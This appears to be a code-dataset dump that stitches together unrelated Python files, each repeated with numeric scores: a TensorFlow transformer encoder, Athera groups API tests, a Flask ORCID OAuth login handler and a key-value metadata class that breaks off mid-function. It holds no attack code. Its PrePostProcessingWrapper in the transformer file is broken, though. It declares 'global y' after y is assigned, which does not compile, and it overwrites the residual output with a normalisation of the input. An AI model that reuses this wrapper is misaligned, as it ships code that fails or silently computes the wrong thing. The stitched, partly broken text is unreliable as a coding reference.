with tf.name_scope("re_add_padding"):
output = tf.squeeze(output, axis=0)
output = tf.scatter_nd(
indices=nonpad_ids,
updates=output,
shape=[batch_size * length, self.hidden_size]
)
output = tf.reshape(output, [batch_size, length, self.hidden_size])
return output | model/transformers.py | import tensorflow as tf
from official.transformer.model import attention_layer, ffn_layer, transformer, model_utils, model_params
from tensor2tensor.models.research import universal_transformer, universal_transformer_util
from tensor2tensor.models import transformer as t2t_transformer
def create(params, transformer_params, mode):
transformer_params.use_convolution = params.use_convolution
constructor = {'transformer': lambda: Transformer(transformer_params, mode == tf.estimator.ModeKeys.TRAIN),
'universal': lambda: UniversalTransformer(transformer_params, mode == tf.estimator.ModeKeys.TRAIN),
'adaptive': lambda: AdaptiveUniversalTransformer(transformer_params, mode)}
return constructor[params.transformer_type]()
def sentence_transformer_params(params):
if params.transformer_type == 'adaptive':
hparams = universal_transformer.adaptive_universal_transformer_base()
hparams.batch_size = params.batch_size
hparams.recurrence_type = 'act'
hparams.act_type = 'basic'
hparams.max_length = params.toks_per_sent
hparams.num_hidden_layers = params.sentence_transformer_num_stacks
hparams.add_hparam("vocab_size", params.vocab_size)
hparams.hidden_size = params.embedding_size
hparams.num_heads = params.sentence_transformer_num_heads
hparams.add_hparam("embedding_device", params.embedding_device)
return hparams
tparams = model_params.TransformerBaseParams()
tparams.batch_size = params.batch_size
tparams.max_length = params.toks_per_sent
tparams.vocab_size = params.vocab_size
tparams.hidden_size = params.embedding_size
tparams.num_heads = params.sentence_transformer_num_heads
tparams.num_hidden_layers = params.sentence_transformer_num_stacks
return tparams
def base_transformer_params(params):
if params.transformer_type == 'adaptive':
hparams = universal_transformer.adaptive_universal_transformer_base()
hparams.batch_size = params.batch_size
hparams.recurrence_type = 'act'
hparams.act_type = 'basic'
hparams.max_length = params.max_doc_len
hparams.num_hidden_layers = params.base_transformer_num_stacks
hparams.add_hparam("vocab_size", params.vocab_size)
hparams.hidden_size = params.embedding_size
hparams.num_heads = params.base_transformer_num_heads
hparams.add_hparam("embedding_device", params.embedding_device)
return hparams
tparams = model_params.TransformerBaseParams()
tparams.batch_size = params.batch_size
tparams.max_length = params.max_doc_len
tparams.vocab_size = params.vocab_size
tparams.hidden_size = params.embedding_size
tparams.num_heads = params.base_transformer_num_heads
tparams.num_hidden_layers = params.base_transformer_num_stacks
return tparams
class Transformer(transformer.Transformer):
def encode_no_lookup(self, embedded_inputs, inputs_mask):
"""Encoder step for transformer given already-embedded inputs
Args:
model: transformer model
embedded_inputs: int tensor with shape [batch_size, input_length, emb_size].
inputs_mask: int tensor with shape [batch_size, input_length]
params: transformer_params
train: boolean flag
Returns:
float tensor with shape [batch_size, input_length, hidden_size]
"""
with tf.name_scope("encode"):
# Prepare inputs to the layer stack by adding positional encodings and
# applying dropout.
inputs_padding = model_utils.get_padding(inputs_mask)
attention_bias = model_utils.get_padding_bias(inputs_mask)
with tf.name_scope("add_pos_encoding"):
length = tf.shape(embedded_inputs)[1]
pos_encoding = model_utils.get_position_encoding(
length, self.params.hidden_size)
encoder_inputs = embedded_inputs + pos_encoding
if self.train:
encoder_inputs = tf.nn.dropout(
encoder_inputs, 1 - self.params.layer_postprocess_dropout)
return self.encoder_stack(encoder_inputs, attention_bias, inputs_padding)
class UniversalTransformer(Transformer):
def __init__(self, params, train):
super(UniversalTransformer, self).__init__(params, train)
self.encoder_stack = EncoderStackUniv(params, train)
class AdaptiveUniversalTransformer:
def __init__(self, params, mode):
params.filter_size = 512
self.hparams = params
self.target_space = 0
self.model = universal_transformer.UniversalTransformerEncoder(params, mode)
self.embedding_device = params.embedding_device
with tf.device(self.embedding_device):
self.word_embeddings = tf.get_variable("word_embeddings", shape=[params.vocab_size, params.hidden_size])
def encode(self, inputs, input_mask=None, _target_space=None, _hparams=None, _features=None, _losses=None):
"""Encode transformer inputs.
Args:
inputs: Transformer inputs [batch_size, input_length] int64 tensor.
input_mask: [batch_size, input_length, hidden_size] mask
_target_space: scalar, target space ID.
_hparams: hyperparmeters for model.
_features: optionally pass the entire features dictionary as well.
This is needed now for "packed" datasets.
_losses: Unused.
Returns:
Tuple of:
encoder_output: Encoder representation.
[batch_size, input_length, hidden_dim]
encoder_extra_output: which is extra encoder output used in some
variants of the model (e.g. in ACT, to pass the ponder-time to body)
"""
# [batch_size, input_length]
nonpadding = tf.to_float(tf.not_equal(inputs, 0))
with tf.device(self.embedding_device):
# [batch_size, input_length, hidden_dim]
inputs = tf.nn.embedding_lookup(self.word_embeddings, inputs)
if input_mask is not None:
inputs += input_mask
return self.encode_no_lookup(inputs, nonpadding)
def encode_no_lookup(self, embedded_inputs, inputs_mask):
"""Encoder step for transformer given already-embedded inputs
Args:
embedded_inputs: int tensor with shape [batch_size, input_length, emb_size].
inputs_mask: tensor with shape [batch_size, input_length]
Returns:
float tensor with shape [batch_size, input_length, hidden_size]
"""
(encoder_input, self_attention_bias, _) = (
t2t_transformer.transformer_prepare_encoder(embedded_inputs, self.target_space, self.hparams))
encoder_input = tf.nn.dropout(encoder_input,
1.0 - self.hparams.layer_prepostprocess_dropout)
(encoder_output, encoder_extra_output) = (
universal_transformer_util.universal_transformer_encoder(
encoder_input,
self_attention_bias,
self.hparams,
nonpadding=inputs_mask,
save_weights_to=self.model.attention_weights))
return encoder_output, encoder_extra_output
class EncoderStack(tf.layers.Layer):
"""Transformer encoder stack.
The encoder stack is made up of N identical layers. Each layer is composed
of the sublayers:
1. Self-attention layer
2. Feedforward network (which is 2 fully-connected layers)
"""
def __init__(self, params, train):
super(EncoderStack, self).__init__()
self.layers = []
for _ in range(params.num_hidden_layers):
# Create sublayers for each layer.
self_attention_layer = attention_layer.SelfAttention(
params.hidden_size, params.num_heads, params.attention_dropout, train)
feed_forward_network = ConvolutionalFeedForwardNetwork(
params.hidden_size, params.filter_size, params.relu_dropout, train) if params.use_convolution else \
ffn_layer.FeedFowardNetwork(params.hidden_size, params.filter_size, params.relu_dropout, train)
self.layers.append([
transformer.PrePostProcessingWrapper(self_attention_layer, params, train),
transformer.PrePostProcessingWrapper(feed_forward_network, params, train)])
# Create final layer normalization layer.
self.output_normalization = transformer.LayerNormalization(params.hidden_size)
# noinspection PyAbstractClass
class EncoderStackUniv(tf.layers.Layer):
"""Transformer encoder stack.
The encoder stack is made up of N identical layers. Each layer is composed
of the sublayers:
1. Self-attention layer
2. Feedforward network (which is 2 fully-connected layers)
"""
def __init__(self, params, train):
super(EncoderStackUniv, self).__init__()
self.layers = []
for _ in range(params.num_hidden_layers):
# Create sublayers for each layer.
self_attention_layer = attention_layer.SelfAttention(
params.hidden_size, params.num_heads, params.attention_dropout, train)
feed_forward_network = ConvolutionalFeedForwardNetwork(
params.hidden_size, params.filter_size, params.relu_dropout, train) if params.use_convolution else \
ffn_layer.FeedFowardNetwork(params.hidden_size, params.filter_size, params.relu_dropout, train)
self.layers.append([
PrePostProcessingWrapper(self_attention_layer, params, train),
PrePostProcessingWrapper(feed_forward_network, params, train)])
# Create final layer normalization layer.
self.output_normalization = transformer.LayerNormalization(params.hidden_size)
# noinspection PyMethodOverriding
def call(self, encoder_inputs, attention_bias, inputs_padding):
"""Return the output of the encoder layer stacks.
Args:
encoder_inputs: tensor with shape [batch_size, input_length, hidden_size]
attention_bias: bias for the encoder self-attention layer.
[batch_size, 1, 1, input_length]
inputs_padding: P
Returns:
Output of encoder layer stack.
float32 tensor with shape [batch_size, input_length, hidden_size]
"""
for n, layer in enumerate(self.layers):
# Run inputs through the sublayers.
self_attention_layer = layer[0]
feed_forward_network = layer[1]
with tf.variable_scope("encoder_stack_univ", reuse=tf.AUTO_REUSE):
with tf.variable_scope("self_attention"):
encoder_inputs = self_attention_layer(encoder_inputs, attention_bias)
with tf.variable_scope("ffn"):
encoder_inputs = feed_forward_network(encoder_inputs, inputs_padding)
return self.output_normalization(encoder_inputs)
class PrePostProcessingWrapper(object):
"""Wrapper class that applies layer pre-processing and post-processing.
Applies the passed layer, a residual connection, dropout, then layer normalization.
"""
def __init__(self, layer, params, train):
self.layer = layer
self.postprocess_dropout = params.layer_postprocess_dropout
self.train = train
# Create normalization layer
self.layer_norm = transformer.LayerNormalization(params.hidden_size)
def __call__(self, x, *args, **kwargs):
# Get layer output
y = self.layer(x, *args, **kwargs)
# residual connection
y = y + x
# Postprocessing: apply dropout and residual connection
if self.train:
global y
y = tf.nn.dropout(y, 1 - self.postprocess_dropout)
# Preprocessing: apply layer normalization
y = self.layer_norm(x)
return y
class ConvolutionalFeedForwardNetwork(tf.layers.Layer):
"""Fully connected feedforward network."""
def __init__(self, hidden_size, filter_size, relu_dropout, train):
super(ConvolutionalFeedForwardNetwork, self).__init__()
self.hidden_size = hidden_size
self.filter_size = filter_size
self.relu_dropout = relu_dropout
self.train = train
self.filter_dense_layer = tf.layers.Dense(
filter_size, use_bias=True, activation=tf.nn.relu, name="filter_layer")
self.convolutional_layer = tf.layers.Conv1D(
filters=filter_size, kernel_size=5, use_bias=True, activation=tf.nn.relu, name='conv_layer')
self.output_dense_layer = tf.layers.Dense(
hidden_size, use_bias=True, name="output_layer")
def call(self, x, padding=None):
"""Return outputs of the feedforward network.
Args:
x: tensor with shape [batch_size, length, hidden_size]
padding: (optional) If set, the padding values are temporarily removed
from x. The padding values are placed back in the output tensor in the
same locations. shape [batch_size, length]
Returns:
Output of the feedforward network.
tensor with shape [batch_size, length, hidden_size]
"""
# Retrieve dynamically known shapes
batch_size = tf.shape(x)[0]
length = tf.shape(x)[1]
if padding is not None:
with tf.name_scope("remove_padding"):
# Flatten padding to [batch_size*length]
pad_mask = tf.reshape(padding, [-1])
nonpad_ids = tf.to_int32(tf.where(pad_mask < 1e-9))
# Reshape x to [batch_size*length, hidden_size] to remove padding
x = tf.reshape(x, [-1, self.hidden_size])
x = tf.gather_nd(x, indices=nonpad_ids)
# Reshape x from 2 dimensions to 3 dimensions.
x.set_shape([None, self.hidden_size])
x = tf.expand_dims(x, axis=0)
output = self.filter_dense_layer(x)
if self.train:
output = tf.nn.dropout(output, 1.0 - self.relu_dropout)
output = self.convolutional_layer(output)
output = self.output_dense_layer(output)
if padding is not None:
with tf.name_scope("re_add_padding"):
output = tf.squeeze(output, axis=0)
output = tf.scatter_nd(
indices=nonpad_ids,
updates=output,
shape=[batch_size * length, self.hidden_size]
)
output = tf.reshape(output, [batch_size, length, self.hidden_size])
return output | 0.949517 | 0.311401 |
from settings import *
from athera.api import groups
import unittest
import uuid
from requests import codes
import os
class GroupsTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.token = os.getenv("ATHERA_API_TEST_TOKEN")
if not cls.token:
raise ValueError("ATHERA_API_TEST_TOKEN environment variable must be set")
def test_get_orgs(self):
""" Positive test """
response = groups.get_orgs(
environment.ATHERA_API_TEST_BASE_URL,
self.token,
)
self.assertEqual(response.status_code, codes.ok)
data = response.json()
group_data = data['groups']
self.assertNotEqual(len(group_data), 0)
first_org = group_data[0]
self.assertNotEqual(len(first_org), 0)
self.assertIn("id", first_org)
def test_get_group(self):
""" Positive test """
response = groups.get_group(
environment.ATHERA_API_TEST_BASE_URL,
environment.ATHERA_API_TEST_GROUP_ID,
self.token,
)
self.assertEqual(response.status_code, codes.ok)
group_data = response.json()
self.assertIn("id", group_data)
def test_get_group_random_target(self):
""" Negative test - random target group """
response = groups.get_group(
environment.ATHERA_API_TEST_BASE_URL,
environment.ATHERA_API_TEST_GROUP_ID,
self.token,
str(uuid.uuid4())
)
self.assertEqual(response.status_code, codes.not_found)
def test_get_group_wrong_target(self):
""" Negative test - target group is real but should not be accessible"""
response = groups.get_group(
environment.ATHERA_API_TEST_BASE_URL,
environment.ATHERA_API_TEST_GROUP_ID,
self.token,
environment.ATHERA_API_TEST_OTHER_GROUP_ID,
)
self.assertEqual(response.status_code, codes.not_found)
def test_get_group_children(self):
""" Positive test """
response = groups.get_group_children(
environment.ATHERA_API_TEST_BASE_URL,
environment.ATHERA_API_TEST_GROUP_ID,
self.token,
)
self.assertEqual(response.status_code, codes.ok)
data = response.json()
group_data = data['groups']
first_child = group_data[0]
self.assertNotEqual(len(first_child), 0)
self.assertIn("id", first_child)
def test_get_group_children_bad_target(self):
""" Negative test - random target group """
response = groups.get_group_children(
environment.ATHERA_API_TEST_BASE_URL,
environment.ATHERA_API_TEST_GROUP_ID,
self.token,
str(uuid.uuid4())
)
self.assertEqual(response.status_code, codes.not_found)
def test_get_group_children_wrong_target(self):
""" Negative test - target group is real but should not be accessible """
response = groups.get_group_children(
environment.ATHERA_API_TEST_BASE_URL,
environment.ATHERA_API_TEST_GROUP_ID,
self.token,
environment.ATHERA_API_TEST_OTHER_GROUP_ID,
)
self.assertEqual(response.status_code, codes.not_found)
def test_get_group_users(self):
""" Positive test """
response = groups.get_group_users(
environment.ATHERA_API_TEST_BASE_URL,
environment.ATHERA_API_TEST_GROUP_ID,
self.token,
)
self.assertEqual(response.status_code, codes.ok)
data = response.json()
group_users = data['users']
self.assertNotEqual(len(group_users), 0)
first_user = group_users[0]
self.assertNotEqual(len(first_user), 0)
self.assertIn("id", first_user)
def test_get_group_users_bad_group(self):
""" Negative test - random group """
response = groups.get_group_users(
environment.ATHERA_API_TEST_BASE_URL,
str(uuid.uuid4()),
self.token,
)
self.assertEqual(response.status_code, codes.forbidden)
def test_get_group_users_wrong_group(self):
""" Negative test - group is real but should not be accessible by this user """
response = groups.get_group_users(
environment.ATHERA_API_TEST_BASE_URL,
environment.ATHERA_API_TEST_OTHER_GROUP_ID,
self.token,
)
self.assertEqual(response.status_code, codes.forbidden)
def test_get_group_users_bad_target(self):
""" Negative test - random target group """
response = groups.get_group_users(
environment.ATHERA_API_TEST_BASE_URL,
environment.ATHERA_API_TEST_GROUP_ID,
self.token,
str(uuid.uuid4())
)
self.assertEqual(response.status_code, codes.not_found)
def test_get_group_users_wrong_target(self):
""" Negative test - target group is real but should not be accessible by this user """
response = groups.get_group_users(
environment.ATHERA_API_TEST_BASE_URL,
environment.ATHERA_API_TEST_GROUP_ID,
self.token,
environment.ATHERA_API_TEST_OTHER_GROUP_ID,
)
self.assertEqual(response.status_code, codes.not_found) | test/api/test_groups.py | from settings import *
from athera.api import groups
import unittest
import uuid
from requests import codes
import os
class GroupsTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.token = os.getenv("ATHERA_API_TEST_TOKEN")
if not cls.token:
raise ValueError("ATHERA_API_TEST_TOKEN environment variable must be set")
def test_get_orgs(self):
""" Positive test """
response = groups.get_orgs(
environment.ATHERA_API_TEST_BASE_URL,
self.token,
)
self.assertEqual(response.status_code, codes.ok)
data = response.json()
group_data = data['groups']
self.assertNotEqual(len(group_data), 0)
first_org = group_data[0]
self.assertNotEqual(len(first_org), 0)
self.assertIn("id", first_org)
def test_get_group(self):
""" Positive test """
response = groups.get_group(
environment.ATHERA_API_TEST_BASE_URL,
environment.ATHERA_API_TEST_GROUP_ID,
self.token,
)
self.assertEqual(response.status_code, codes.ok)
group_data = response.json()
self.assertIn("id", group_data)
def test_get_group_random_target(self):
""" Negative test - random target group """
response = groups.get_group(
environment.ATHERA_API_TEST_BASE_URL,
environment.ATHERA_API_TEST_GROUP_ID,
self.token,
str(uuid.uuid4())
)
self.assertEqual(response.status_code, codes.not_found)
def test_get_group_wrong_target(self):
""" Negative test - target group is real but should not be accessible"""
response = groups.get_group(
environment.ATHERA_API_TEST_BASE_URL,
environment.ATHERA_API_TEST_GROUP_ID,
self.token,
environment.ATHERA_API_TEST_OTHER_GROUP_ID,
)
self.assertEqual(response.status_code, codes.not_found)
def test_get_group_children(self):
""" Positive test """
response = groups.get_group_children(
environment.ATHERA_API_TEST_BASE_URL,
environment.ATHERA_API_TEST_GROUP_ID,
self.token,
)
self.assertEqual(response.status_code, codes.ok)
data = response.json()
group_data = data['groups']
first_child = group_data[0]
self.assertNotEqual(len(first_child), 0)
self.assertIn("id", first_child)
def test_get_group_children_bad_target(self):
""" Negative test - random target group """
response = groups.get_group_children(
environment.ATHERA_API_TEST_BASE_URL,
environment.ATHERA_API_TEST_GROUP_ID,
self.token,
str(uuid.uuid4())
)
self.assertEqual(response.status_code, codes.not_found)
def test_get_group_children_wrong_target(self):
""" Negative test - target group is real but should not be accessible """
response = groups.get_group_children(
environment.ATHERA_API_TEST_BASE_URL,
environment.ATHERA_API_TEST_GROUP_ID,
self.token,
environment.ATHERA_API_TEST_OTHER_GROUP_ID,
)
self.assertEqual(response.status_code, codes.not_found)
def test_get_group_users(self):
""" Positive test """
response = groups.get_group_users(
environment.ATHERA_API_TEST_BASE_URL,
environment.ATHERA_API_TEST_GROUP_ID,
self.token,
)
self.assertEqual(response.status_code, codes.ok)
data = response.json()
group_users = data['users']
self.assertNotEqual(len(group_users), 0)
first_user = group_users[0]
self.assertNotEqual(len(first_user), 0)
self.assertIn("id", first_user)
def test_get_group_users_bad_group(self):
""" Negative test - random group """
response = groups.get_group_users(
environment.ATHERA_API_TEST_BASE_URL,
str(uuid.uuid4()),
self.token,
)
self.assertEqual(response.status_code, codes.forbidden)
def test_get_group_users_wrong_group(self):
""" Negative test - group is real but should not be accessible by this user """
response = groups.get_group_users(
environment.ATHERA_API_TEST_BASE_URL,
environment.ATHERA_API_TEST_OTHER_GROUP_ID,
self.token,
)
self.assertEqual(response.status_code, codes.forbidden)
def test_get_group_users_bad_target(self):
""" Negative test - random target group """
response = groups.get_group_users(
environment.ATHERA_API_TEST_BASE_URL,
environment.ATHERA_API_TEST_GROUP_ID,
self.token,
str(uuid.uuid4())
)
self.assertEqual(response.status_code, codes.not_found)
def test_get_group_users_wrong_target(self):
""" Negative test - target group is real but should not be accessible by this user """
response = groups.get_group_users(
environment.ATHERA_API_TEST_BASE_URL,
environment.ATHERA_API_TEST_GROUP_ID,
self.token,
environment.ATHERA_API_TEST_OTHER_GROUP_ID,
)
self.assertEqual(response.status_code, codes.not_found) | 0.651355 | 0.35421 |
from flask import flash, redirect, session, url_for, current_app, Markup
from flask_user import current_user
from flask_login import login_user
from app.oauth.orcid_flask_dance import make_orcid_blueprint
from flask_dance.consumer import oauth_authorized, oauth_error
from flask_dance.consumer.storage.sqla import SQLAlchemyStorage
from sqlalchemy.orm.exc import NoResultFound
from app.models import db, User, OAuth
from datetime import datetime
from pprint import pprint
orcid_blueprint = make_orcid_blueprint(
storage=SQLAlchemyStorage(OAuth, db.session, user=current_user)
)
@oauth_authorized.connect_via(orcid_blueprint)
def orcid_logged_in(orcid_blueprint, token):
"""
Handles the oauth dance for ORCID logins
Args:
orchid_blueprint: The instantiated orcid blueprint
token: the ouath token
Result:
Will do one of four things:
1. If user is not logged in, but there is an oauth, will login
2. If user is not logged in, will create a new user using information from orchid, and login
3. If a user is logged in, and oauth is associated already, will pass through
4. If a user is logged in, but no oauth associated, will associate the oauth
"""
# Check if I have an API token
if not token:
flash("Failed to log in.", category="error")
return False
# get the orcid id information
# ORCID API calls require that the orcid id be in the request, so that needs
# to be extracted from the token prior to making any requests
orcid_user_id = token['orcid']
response = orcid_blueprint.session.get("{}/record".format(orcid_user_id))
if not response.ok:
flash("Failed to get ORCID User Data", category="error")
return False
orcid_record = response.json()
pprint(orcid_record)
# Find this OAuth in the
query = OAuth.query.filter_by(
provider=orcid_blueprint.name, provider_user_id=orcid_user_id)
try:
oauth = query.one()
except NoResultFound:
oauth = OAuth(
provider=orcid_blueprint.name,
provider_user_id=orcid_user_id,
provider_user_login=orcid_user_id,
token=token)
if current_user.is_anonymous:
print("Current user is anonymous")
if oauth.user:
# Case 1 (above)
return current_app.user_manager._do_login_user(oauth.user, url_for("main.public"))
else:
# Case 2 (above)
print("!!! No Oauth")
orcid_person = orcid_record['person']
# check if there is a user with this email address
# Check to see if the ORCID user has an email exposed, otherwise, we cannot use it
if len(orcid_person['emails']['email']) == 0:
flash(Markup(
"Failed to create new user, must have at least one ORCID "
"email address accessible to restricted. Please login to your "
"ORCID account at http://orcid.org and update your permissions."
" Please see <a href='https://support.orcid.org/hc/en-us/articles/360006897614'>"
" Visibitility in ORCID</a> "
"for more information."))
return redirect(url_for("user.login"))
return False
orcid_email = orcid_person['emails']['email'][0]['email']
query = User.query.filter_by(email=orcid_email)
try:
nrc_u = query.one()
oauth.user = nrc_u
db.session.add(oauth)
db.session.commit()
login_user(oauth.user)
except NoResultFound:
print("!!!! we need to make an account")
# Case 3
try:
user = User(email=orcid_person['emails']['email'][0]['email'],
full_name="{} {}".format(orcid_person['name']['given-names']['value'],
orcid_person['name']['family-name']['value']),
active=True,
email_confirmed_at=datetime.utcnow(),
)
user.add_role("member")
user.add_role("registered-orcid", add_to_roles=True)
oauth.user = user
db.session.add_all([user, oauth])
db.session.commit()
# Need to use private method to bypass in this case
flash("Please update your Profile affiliation and affiliation type")
return current_app.user_manager._do_login_user(user, url_for('profile.current_user_profile_page'))
except Exception as e:
flash("There was an error creating a user from the ORCID credentials: {}".format(e))
return redirect(url_for("user.login"))
else:
print("!!! Authenticated User")
if oauth.user:
flash("Account already associated with another user, cannot be associated")
return redirect(url_for('profile.current_user_profile_page'))
else:
# Case 4 (above)
print("!!! SHOULD BE HERE")
oauth.user = current_user
db.session.add(oauth)
db.session.commit()
flash("Successfully linked ORCID account")
return False
@oauth_authorized.connect
def redirect_to_next_url(orcid_blueprint, token):
"""
redirect function to handle properly redirec if
login_next_url exists in the session
"""
# retrieve `next_url` from Flask's session cookie
if session.get('login_next_url') is not None:
next_url = session["login_next_url"]
# redirect the user to `next_url`
return redirect(next_url)
@oauth_error.connect_via(orcid_blueprint)
def orcid_error(orcid_blueprint, **kwargs):
"""
Handles passing back ouath errors elegantly
Args:
orchid_blueprint: Orcid Blueprint
Result:
Flashes error messages if they exist
"""
msg = "OAuth error from {name}! ".format(name=orcid_blueprint.name)
for k, v in kwargs.items():
msg += "{} = {} ".format(k, str(v))
print("msg= {}".format(msg))
flash(msg, category="error") | app/oauth/orcid_blueprint.py | from flask import flash, redirect, session, url_for, current_app, Markup
from flask_user import current_user
from flask_login import login_user
from app.oauth.orcid_flask_dance import make_orcid_blueprint
from flask_dance.consumer import oauth_authorized, oauth_error
from flask_dance.consumer.storage.sqla import SQLAlchemyStorage
from sqlalchemy.orm.exc import NoResultFound
from app.models import db, User, OAuth
from datetime import datetime
from pprint import pprint
orcid_blueprint = make_orcid_blueprint(
storage=SQLAlchemyStorage(OAuth, db.session, user=current_user)
)
@oauth_authorized.connect_via(orcid_blueprint)
def orcid_logged_in(orcid_blueprint, token):
"""
Handles the oauth dance for ORCID logins
Args:
orchid_blueprint: The instantiated orcid blueprint
token: the ouath token
Result:
Will do one of four things:
1. If user is not logged in, but there is an oauth, will login
2. If user is not logged in, will create a new user using information from orchid, and login
3. If a user is logged in, and oauth is associated already, will pass through
4. If a user is logged in, but no oauth associated, will associate the oauth
"""
# Check if I have an API token
if not token:
flash("Failed to log in.", category="error")
return False
# get the orcid id information
# ORCID API calls require that the orcid id be in the request, so that needs
# to be extracted from the token prior to making any requests
orcid_user_id = token['orcid']
response = orcid_blueprint.session.get("{}/record".format(orcid_user_id))
if not response.ok:
flash("Failed to get ORCID User Data", category="error")
return False
orcid_record = response.json()
pprint(orcid_record)
# Find this OAuth in the
query = OAuth.query.filter_by(
provider=orcid_blueprint.name, provider_user_id=orcid_user_id)
try:
oauth = query.one()
except NoResultFound:
oauth = OAuth(
provider=orcid_blueprint.name,
provider_user_id=orcid_user_id,
provider_user_login=orcid_user_id,
token=token)
if current_user.is_anonymous:
print("Current user is anonymous")
if oauth.user:
# Case 1 (above)
return current_app.user_manager._do_login_user(oauth.user, url_for("main.public"))
else:
# Case 2 (above)
print("!!! No Oauth")
orcid_person = orcid_record['person']
# check if there is a user with this email address
# Check to see if the ORCID user has an email exposed, otherwise, we cannot use it
if len(orcid_person['emails']['email']) == 0:
flash(Markup(
"Failed to create new user, must have at least one ORCID "
"email address accessible to restricted. Please login to your "
"ORCID account at http://orcid.org and update your permissions."
" Please see <a href='https://support.orcid.org/hc/en-us/articles/360006897614'>"
" Visibitility in ORCID</a> "
"for more information."))
return redirect(url_for("user.login"))
return False
orcid_email = orcid_person['emails']['email'][0]['email']
query = User.query.filter_by(email=orcid_email)
try:
nrc_u = query.one()
oauth.user = nrc_u
db.session.add(oauth)
db.session.commit()
login_user(oauth.user)
except NoResultFound:
print("!!!! we need to make an account")
# Case 3
try:
user = User(email=orcid_person['emails']['email'][0]['email'],
full_name="{} {}".format(orcid_person['name']['given-names']['value'],
orcid_person['name']['family-name']['value']),
active=True,
email_confirmed_at=datetime.utcnow(),
)
user.add_role("member")
user.add_role("registered-orcid", add_to_roles=True)
oauth.user = user
db.session.add_all([user, oauth])
db.session.commit()
# Need to use private method to bypass in this case
flash("Please update your Profile affiliation and affiliation type")
return current_app.user_manager._do_login_user(user, url_for('profile.current_user_profile_page'))
except Exception as e:
flash("There was an error creating a user from the ORCID credentials: {}".format(e))
return redirect(url_for("user.login"))
else:
print("!!! Authenticated User")
if oauth.user:
flash("Account already associated with another user, cannot be associated")
return redirect(url_for('profile.current_user_profile_page'))
else:
# Case 4 (above)
print("!!! SHOULD BE HERE")
oauth.user = current_user
db.session.add(oauth)
db.session.commit()
flash("Successfully linked ORCID account")
return False
@oauth_authorized.connect
def redirect_to_next_url(orcid_blueprint, token):
"""
redirect function to handle properly redirec if
login_next_url exists in the session
"""
# retrieve `next_url` from Flask's session cookie
if session.get('login_next_url') is not None:
next_url = session["login_next_url"]
# redirect the user to `next_url`
return redirect(next_url)
@oauth_error.connect_via(orcid_blueprint)
def orcid_error(orcid_blueprint, **kwargs):
"""
Handles passing back ouath errors elegantly
Args:
orchid_blueprint: Orcid Blueprint
Result:
Flashes error messages if they exist
"""
msg = "OAuth error from {name}! ".format(name=orcid_blueprint.name)
for k, v in kwargs.items():
msg += "{} = {} ".format(k, str(v))
print("msg= {}".format(msg))
flash(msg, category="error") | 0.399343 | 0.095349 |
import os
from squirrel.shared.squirrelerror import SquirrelError
from bvzlocalization import LocalizedResource
class KeyValuePairs(object):
"""
A class to manage a specific metadata (key=value pairs) file within an asset.
"""
# ------------------------------------------------------------------------------------------------------------------
def __init__(self,
resources_obj,
asset_d):
"""
Set up instance to hold the path to the keywords file.
"""
assert type(resources_obj) is LocalizedResource
assert type(asset_d) is str
self.localized_resource_obj = resources_obj
self.asset_d = asset_d
self.keyvalues_p = os.path.join(asset_d, ".metadata", "keyvalues")
# ------------------------------------------------------------------------------------------------------------------
def _verify_asset_dir_exists(self):
"""
Checks to make sure the asset directory exists.
:return:
Nothing.
"""
if not os.path.exists(self.asset_d):
err_msg = self.localized_resource_obj.get_error_msg(11208)
raise SquirrelError(err_msg, 11208)
# ------------------------------------------------------------------------------------------------------------------
def _verify_key_value_file_exists(self):
"""
Checks to make sure the key value file exists.
:return:
Nothing.
"""
if not os.path.exists(self.keyvalues_p):
err_msg = self.localized_resource_obj.get_error_msg(11109)
raise SquirrelError(err_msg, 11109)
# ------------------------------------------------------------------------------------------------------------------
def add_key_value_pairs(self,
key_value_pairs):
"""
Adds key value pairs to the keyvalues metadata file.
:param key_value_pairs:
The dict of key value pairs to add.
:return:
Nothing.
"""
assert type(key_value_pairs) is dict
self._verify_asset_dir_exists()
try:
existing_keys = self.get_key_value_pairs()
except SquirrelError:
existing_keys = dict()
for key, value in key_value_pairs.items():
existing_keys[key.upper()] = value
with open(self.keyvalues_p, "w") as f:
for key, value in existing_keys.items():
f.write(key + "=" + value + "\n")
# ------------------------------------------------------------------------------------------------------------------
def remove_key_value_pairs(self,
keys):
"""
Removes key value pairs from the keyvalues metadata file.
:param keys:
The list of keys to remove.
:return:
Nothing.
"""
self._verify_asset_dir_exists()
assert type(keys) is list
for i in range(len(keys)):
keys[i] = keys[i].upper()
existing_key_value_pairs = self.get_key_value_pairs()
with open(self.keyvalues_p, "w") as f:
for existing_key, value in existing_key_value_pairs.items():
if existing_key.strip().upper() not in keys:
f.write(existing_key.strip().upper() + "=" + value + "\n")
# ------------------------------------------------------------------------------------------------------------------
def get_key_value_pairs(self):
"""
Returns a dictionary of key value pairs from the keyvalues metadata file.
:return:
A dictionary of key value pairs.
"""
self._verify_key_value_file_exists()
with open(self.keyvalues_p, "r") as f:
lines = f.readlines()
output = dict()
for line in lines:
output[line.split("=", 1)[0]] = line.split("=", 1)[1].rstrip()
return output | src/squirrel/asset/keyvaluepairs.py | import os
from squirrel.shared.squirrelerror import SquirrelError
from bvzlocalization import LocalizedResource
class KeyValuePairs(object):
"""
A class to manage a specific metadata (key=value pairs) file within an asset.
"""
# ------------------------------------------------------------------------------------------------------------------
def __init__(self,
resources_obj,
asset_d):
"""
Set up instance to hold the path to the keywords file.
"""
assert type(resources_obj) is LocalizedResource
assert type(asset_d) is str
self.localized_resource_obj = resources_obj
self.asset_d = asset_d
self.keyvalues_p = os.path.join(asset_d, ".metadata", "keyvalues")
# ------------------------------------------------------------------------------------------------------------------
def _verify_asset_dir_exists(self):
"""
Checks to make sure the asset directory exists.
:return:
Nothing.
"""
if not os.path.exists(self.asset_d):
err_msg = self.localized_resource_obj.get_error_msg(11208)
raise SquirrelError(err_msg, 11208)
# ------------------------------------------------------------------------------------------------------------------
def _verify_key_value_file_exists(self):
"""
Checks to make sure the key value file exists.
:return:
Nothing.
"""
if not os.path.exists(self.keyvalues_p):
err_msg = self.localized_resource_obj.get_error_msg(11109)
raise SquirrelError(err_msg, 11109)
# ------------------------------------------------------------------------------------------------------------------
def add_key_value_pairs(self,
key_value_pairs):
"""
Adds key value pairs to the keyvalues metadata file.
:param key_value_pairs:
The dict of key value pairs to add.
:return:
Nothing.
"""
assert type(key_value_pairs) is dict
self._verify_asset_dir_exists()
try:
existing_keys = self.get_key_value_pairs()
except SquirrelError:
existing_keys = dict()
for key, value in key_value_pairs.items():
